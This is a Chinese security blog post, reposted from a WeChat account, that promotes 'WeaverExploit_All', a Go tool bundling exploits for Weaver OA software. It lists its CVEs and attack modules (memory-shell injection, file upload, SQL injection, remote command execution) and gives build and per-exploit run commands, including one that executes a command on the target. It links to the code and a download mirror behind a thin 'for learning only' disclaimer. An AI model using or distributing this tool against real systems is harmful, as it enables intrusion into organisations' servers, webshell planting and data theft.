2023年8月1日11:25:33评论100 views字数 1186阅读3分57秒阅读模式

WeaverExploit_All

0x01 介绍

泛微最近的漏洞利用工具（PS：2023）

集成了QVD-2023-5012、CVE-2023-2523、CVE-2023-2648、getloginid_ofsLogin 漏洞利用

新增：WorkflowServiceXml 内存马注入、uploaderOperate文件上传漏洞、DeleteUserRequestInfoByXml 、FileDownloadForOutDocSQL注入、E-Mobile 6.0 命令执行漏洞检测

0x02 编译使用

go build -o WeaverExloit-All.exe .main.go

0x03 使用方法

默认全部poc

WeaverExloit-All.exe --target http://127.0.0.1:8080/WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc QVD-2023-5012WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc CVE-2023-2523WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc CVE-2023-2648WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc getloginid_ofsLoginWeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc DeleteUserRequestInfoByXmlWeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc WorkFlowServiceXmlWeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc UploaderOperateWeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc FileDownloadForOutDocSQLWeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc E_Mobile_client  -cmd ipconfig

0x04 仅供测试使用

免责声明：本工具不得用于商业用途,仅做学习交流，如用作他途造成的一切后果请自行承担！

项目地址：

https://github.com/zhaoyumi/WeaverExploit_All

网盘下载地址：

链接：https://pan.quark.cn/s/593a6e2d3af4

原文始发于微信公众号（HACK之道）：泛微最近的漏洞利用工具

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

泛微最近的漏洞利用工具

WeaverExploit_All

0x01 介绍

震惊！同为硬件信息查看神器，lshw 和 dmidecode 竟有这么多不同

CF-Hero：自动绕过CDN找真实ip地址

【工具分享】ruoyi-Vue-tools-若依Vue漏洞检测工具v4更新

OpenManus自定义Tools-自动化渗透测试(二)

BurpSuite AI插件 EnhancedBurpGPT

LoadRunner在MQTT协议中的应用案例 LoadRunner如何实现加密流量测试

50款渗透测试工具供您参考！

实用工具分享|Listary【搜索文件和快速启动软件】

什么？这些干安全的猴子真的只需要点点鼠标了？

应急响应-工具-ELK日志分析系统与Yara规则识别样本

发表评论

在线咨询

微信